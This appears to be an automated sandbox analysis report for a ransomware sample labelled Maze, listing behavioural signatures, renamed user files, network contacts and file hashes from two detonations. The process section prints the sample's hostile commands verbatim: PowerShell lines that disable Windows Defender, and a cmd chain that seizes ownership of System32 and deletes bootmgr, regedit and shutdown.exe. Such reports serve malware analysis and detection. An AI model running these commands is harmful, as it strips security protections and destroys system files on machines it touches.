Analysis Overview
SHA256
ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1
Threat Level: Known bad
The file UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe was found to be: Known bad.
Malicious Activity Summary
Maze
Contains code to disable Windows Defender
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Possible privilege escalation attempt
Executes dropped EXE
Disables Task Manager via registry modification
Modifies extensions of user files
Checks BIOS information in registry
Modifies file permissions
Themida packer
Checks computer location settings
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-20 05:03
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-20 05:03
Reported
2022-09-20 05:08
Platform
win7-20220812-en
Max time kernel
139s
Max time network
52s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Maze
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\DisconnectSkip.crw => C:\Users\Admin\Pictures\DisconnectSkip.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveUnblock.crw => C:\Users\Admin\Pictures\ResolveUnblock.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fb8901bfb5eb8b5cd51c393f6e11ea2e |
| SHA1 | 659d7e2e79485eb006372ff061fdffe0961f5e43 |
| SHA256 | bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209 |
| SHA512 | 82e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49 |
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
| MD5 | e4f24d91d8e7290ffd6afc8aa01c6d63 |
| SHA1 | b552c6af33cc5a62379028687924406cba8ff74d |
| SHA256 | 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb |
| SHA512 | ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-20 05:03
Reported
2022-09-20 05:08
Platform
win10v2004-20220812-en
Max time kernel
173s
Max time network
195s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Maze
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\CloseMove.png => C:\Users\Admin\Pictures\CloseMove.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinAssert.crw => C:\Users\Admin\Pictures\JoinAssert.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OutRedo.png => C:\Users\Admin\Pictures\OutRedo.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeProtect.png => C:\Users\Admin\Pictures\RevokeProtect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SendTrace.png => C:\Users\Admin\Pictures\SendTrace.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SetDisconnect.png => C:\Users\Admin\Pictures\SetDisconnect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | N/A | tcp |
| US | 93.184.220.29:80 | N/A | tcp |
| US | 93.184.221.240:80 | N/A | tcp |
| US | 93.184.221.240:80 | N/A | tcp |
| NL | 13.69.109.130:443 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
| MD5 | e4f24d91d8e7290ffd6afc8aa01c6d63 |
| SHA1 | b552c6af33cc5a62379028687924406cba8ff74d |
| SHA256 | 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb |
| SHA512 | ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e243a38635ff9a06c87c2a61a2200656 |
| SHA1 | ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc |
| SHA256 | af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f |
| SHA512 | 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4 |